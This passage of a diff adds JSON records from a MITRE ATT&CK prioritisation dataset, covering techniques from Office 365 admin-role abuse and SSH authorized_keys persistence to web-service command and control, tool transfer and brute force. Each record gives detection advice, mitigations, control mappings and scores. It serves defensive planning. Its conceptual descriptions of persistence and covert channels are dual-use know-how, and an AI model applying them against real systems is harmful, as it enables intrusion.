+            "Group: Group Modification",
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1098",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1098.003",
+        "name": "Account Manipulation: Add Office 365 Global Administrator Role",
+        "description": "An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.",
+        "url": "https://attack.mitre.org/techniques/T1098/003",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
+        "platforms": [
+            "Office 365"
+        ],
+        "data_sources": [
+            "User Account: User Account Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1098",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.30952380952380953,
+        "adjusted_score": 0.30952380952380953,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1098.004",
+        "name": "Account Manipulation: SSH Authorized Keys",
+        "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)",
+        "url": "https://attack.mitre.org/techniques/T1098/004",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1098",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.3285714285714286,
+        "adjusted_score": 0.3285714285714286,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.3",
+            "4.1",
+            "4.8",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.6",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-12",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1102",
+        "name": "Web Service",
+        "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+        "url": "https://attack.mitre.org/techniques/T1102",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1102.001",
+                "name": "Web Service: Dead Drop Resolver",
+                "url": "https://attack.mitre.org/techniques/T1102/001",
+                "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            },
+            {
+                "tid": "T1102.002",
+                "name": "Web Service: Bidirectional Communication",
+                "url": "https://attack.mitre.org/techniques/T1102/002",
+                "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            },
+            {
+                "tid": "T1102.003",
+                "name": "Web Service: One-Way Communication",
+                "url": "https://attack.mitre.org/techniques/T1102/003",
+                "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
+                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+                "mitigations": [
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.5374099723809524,
+        "adjusted_score": 0.5374099723809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1523809523809524,
+            "mitigation_score": 0.23636363636363636,
+            "detection_score": 0.06
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.03502902
+    },
+    {
+        "tid": "T1102.001",
+        "name": "Web Service: Dead Drop Resolver",
+        "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+        "url": "https://attack.mitre.org/techniques/T1102/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1102",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.2380952380952381,
+        "adjusted_score": 0.2380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1102.002",
+        "name": "Web Service: Bidirectional Communication",
+        "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+        "url": "https://attack.mitre.org/techniques/T1102/002",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1102",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1102.003",
+        "name": "Web Service: One-Way Communication",
+        "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
+        "url": "https://attack.mitre.org/techniques/T1102/003",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1102",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "9.3",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1104",
+        "name": "Multi-Stage Channels",
+        "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.",
+        "url": "https://attack.mitre.org/techniques/T1104",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.25012692000000003,
+        "adjusted_score": 0.25012692000000003,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1,
+            "mitigation_score": 0.18181818181818182,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.00012692
+    },
+    {
+        "tid": "T1105",
+        "name": "Ingress Tool Transfer",
+        "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
+        "url": "https://attack.mitre.org/techniques/T1105",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 1.5862620004761905,
+        "adjusted_score": 1.5862620004761905,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.49047619047619045,
+            "mitigation_score": 0.18181818181818182,
+            "detection_score": 0.83
+        },
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.69578581
+    },
+    {
+        "tid": "T1106",
+        "name": "Native API",
+        "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).",
+        "url": "https://attack.mitre.org/techniques/T1106",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Module: Module Load",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.952785081904762,
+        "adjusted_score": 0.952785081904762,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.16190476190476188,
+            "mitigation_score": 0.14545454545454545,
+            "detection_score": 0.18
+        },
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.24088032
+    },
+    {
+        "tid": "T1110",
+        "name": "Brute Force",
+        "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.",
+        "url": "https://attack.mitre.org/techniques/T1110",
+        "tactics": [
+            "Credential Access"
+        ],
